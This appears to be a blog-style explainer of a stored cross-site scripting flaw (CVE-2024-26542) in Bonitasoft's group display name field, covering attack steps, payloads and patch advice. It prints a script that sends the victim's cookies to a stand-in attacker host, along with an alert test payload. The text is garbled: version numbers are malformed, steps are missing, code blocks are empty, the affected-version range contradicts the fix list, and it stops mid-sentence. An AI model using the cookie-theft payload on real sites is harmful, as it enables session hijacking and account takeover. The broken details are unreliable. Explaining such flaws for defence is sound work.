CVE-2024-26542 - Cross Site Scripting (XSS) in Bonitasoft up to 7.14—How Attackers Exploit Groups Display Name

CVE-2024-26542 is a freshly-identified Cross Site Scripting (XSS) bug affecting Bonitasoft, S.A’s process management platform. This security hole exists in versions up to 7.14 and is only fixed in the following patched versions: 9..2, 8..3, 7.15.7, and 7.14.8. An attacker can slip a specially crafted JavaScript payload inside the “Groups Display name” field. When a user views this name (for example, in the web-based admin console), the code executes in the context of their browser—leading to data theft, account takeover, or more.

Let’s break down how this flaw works, look at some code, and see what you can do about it.

What is Bonitasoft and Why Is This Serious?

Bonitasoft provides tools for automating business workflows and processes. Because Bonitasoft is often used at the heart of a company’s operations, vulnerabilities like CVE-2024-26542 can have far-reaching consequences. XSS issues allow attackers to:

Alter how the site behaves or appears

Bonitasoft’s security advisory confirms that this is a stored XSS—meaning the malicious input is saved on the server and shown to all users who load it.

They save the group.

4. When an admin or user loads the management panel and sees the Groups list, the payload is rendered and executed in their browser.

*This could be swapped out for something stealthier, like code to steal cookies, or run actions as a logged-in user—for example:*

<script>
fetch('https://attacker.com/steal?cookie='+document.cookie);
</script>

`html

- Fill other required fields, but keep them normal.

Step 3: Save and Wait
- When any user (including admins) loads the group list or group detail pages, the attacker’s code will run in their context.

### Example Payloads

- Show alert (test XSS):
  

html

- Steal cookies:
  

html

---

## Why This Works: Vulnerability Analysis

The "Groups Display name" field was not properly sanitized or escaped before rendering in the web interface:

- Raw HTML input could end up being rendered directly to the page.
- User input like <img onerror=alert(1)> is transformed into active code in the browser.

Here’s a simplified (pseudo) version of server-side code that was probably at fault:

java
// BAD: No escaping of user input
out.print(group.getDisplayName());

The correct way would be to escape all HTML special characters:

java
// GOOD: Encode before output!
out.print(htmlEscape(group.getDisplayName()));
<br><br>---<br><br>## Patch and Fixes<br><br>Bonitasoft patched this flaw in:<br><br>- <b>7.14.8</b> (for 7.14 LTS)<br>- <b>7.15.7</b> (for 7.15 LTS)<br>- <b>8..3</b><br>- <b>9..2</b> (latest as of June 2024)<br><br>Update your Bonitasoft installation immediately to one of these versions or higher. <br><b>See Bonitasoft’s official advisory here.</b><br><br>---<br><br>## What Should You Do?<br><br>1. <b>Patch Immediately.</b><br> - If you’re running any of the impacted versions, upgrade as soon as possible.<br><br>2. <b>Audit Your Groups.</b><br> - Check the Groups list for suspicious “display names” containing